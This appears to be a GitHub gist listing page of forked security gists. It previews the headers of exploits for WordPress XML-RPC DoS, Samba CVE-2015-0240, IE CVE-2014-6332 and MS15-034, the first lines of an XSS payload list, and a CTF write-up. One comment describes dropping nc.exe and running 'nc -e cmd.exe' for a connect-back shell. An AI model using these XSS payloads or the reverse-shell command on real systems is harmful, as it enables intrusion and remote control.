Requests:
POST /api/user/reg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
kuteminh11
kuteminh11
/ wp_dos.py
Created
February 28, 2019 04:03
— forked from ethicalhack3r/wp_dos.py
WP XML-RPC DoS Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################################# | |
| # CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS# | |
| # Author: Nir Goldshlager - Salesforce.com Product Security Team# | |
| # This is a Proof of Concept Exploit, Please use responsibly.# | |
| ################################################################################# | |
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import threading | |
| import time | |
| import urllib |
kuteminh11
/ 666_lines_of_XSS_vectors.html
Created
November 28, 2017 08:50
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
kuteminh11
/ SHA_2017_angr_tut.py
Last active
August 8, 2017 01:22
— forked from quangnh89/Suspect_File_1_writeup.py
SHA2017 CTF Rev100 Suspect File 1 write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import angr | |
| def malloc_cb(state): | |
| print "malloc!" | |
| state.regs.eax = 0xc0000000 # concrete address | |
| def strlen_cb(state): |
kuteminh11
/ 1266386.md
Created
May 29, 2017 10:06
— forked from cure53/1266386.md
OTF+SVG allows to read info character by character with only a STYLE injection through XEE & timing
Mozilla Firefox supports a feature that allows to define SVG images inside an OTF font to represent characters. This is useful if we for example want to work with colorful characters, Emoji, animated characters and so on. Firefox is currently the only relevant browser supporting this technology.
The general technology and its advantages are described here:
kuteminh11
/ cve-2015-0240_samba_exploit.py
Created
May 18, 2017 01:58
— forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
kuteminh11
/ cve-2015-0240_samba_poc
Created
May 18, 2017 01:58
— forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerabilty (CVE-2015-0240)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| This PoC does only triggering the bug | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ | |
| ################# | |
| Exploitability against CentOS/Ubuntu binaries |
kuteminh11
/ cve-2014-6332_exploit.html
Created
May 18, 2017 01:58
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
kuteminh11
/ cve-2014-6332_win7_ie11_poc.html
Created
May 18, 2017 01:58
— forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode | |
| - Tested on IE11 + Windows 7 64-bit | |
| References: | |
| - original PoC - http://www.exploit-db.com/exploits/35229/ | |
| - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ | |
| - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html |
kuteminh11
/ http_sys_pseudo.c
Created
May 18, 2017 01:57
— forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
| All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
| For anyone want to know what function are patched. | |
| Just open patched version and find all functions reference to RtlULongLongAdd(). | |
| */ | |
NewerOlder